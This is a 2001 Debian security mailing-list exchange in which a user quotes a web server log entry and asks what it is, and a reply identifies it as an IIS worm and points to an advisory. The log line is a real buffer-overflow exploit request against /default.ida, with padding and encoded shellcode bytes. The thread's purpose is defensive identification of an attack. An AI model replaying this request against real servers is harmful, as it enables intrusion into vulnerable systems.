RE: CGI Buffer Overflow?

To: <debian-security@lists.debian.org>
Subject: RE: CGI Buffer Overflow?
From: "Davey Goode" <Davey_Goode@bond.edu.au>
Date: Fri, 20 Jul 2001 09:00:16 +1000
Message-id: <[🔎] 002901c110a6$93e0bfc0$990bf483@combat>
In-reply-to: <[🔎] 3B574E66.9EC27245@brectanu.ais.vt.edu>

Its an IIS worm

Have a lookie

http://www.eeye.com/html/Research/Advisories/AL20010717.html

/dg

-----Original Message-----
From: brectanu@vt.edu [mailto:brectanu@vt.edu] 
Sent: Friday, 20 July 2001 7:17 AM
To: debian-security@lists.debian.org
Subject: CGI Buffer Overflow?


Anyone seen this before?  I have looked around for similar attacks, but
cannot find any info.  I assume that is a unicode string padded out with
Ns.  How would I go about finding out what is in the string?


xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a  HTTP/1.0" 400 328


--Brian


--  
To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org

Reply to:

References:
- CGI Buffer Overflow?
  - From: Brian Rectanus <brectanu@vt.edu>

Prev by Date: Re: CGI Buffer Overflow?
Next by Date: Re: CGI Buffer Overflow?
Previous by thread: Re: CGI Buffer Overflow?
Next by thread: Re: CGI Buffer Overflow?
Index(es):
- Date
- Thread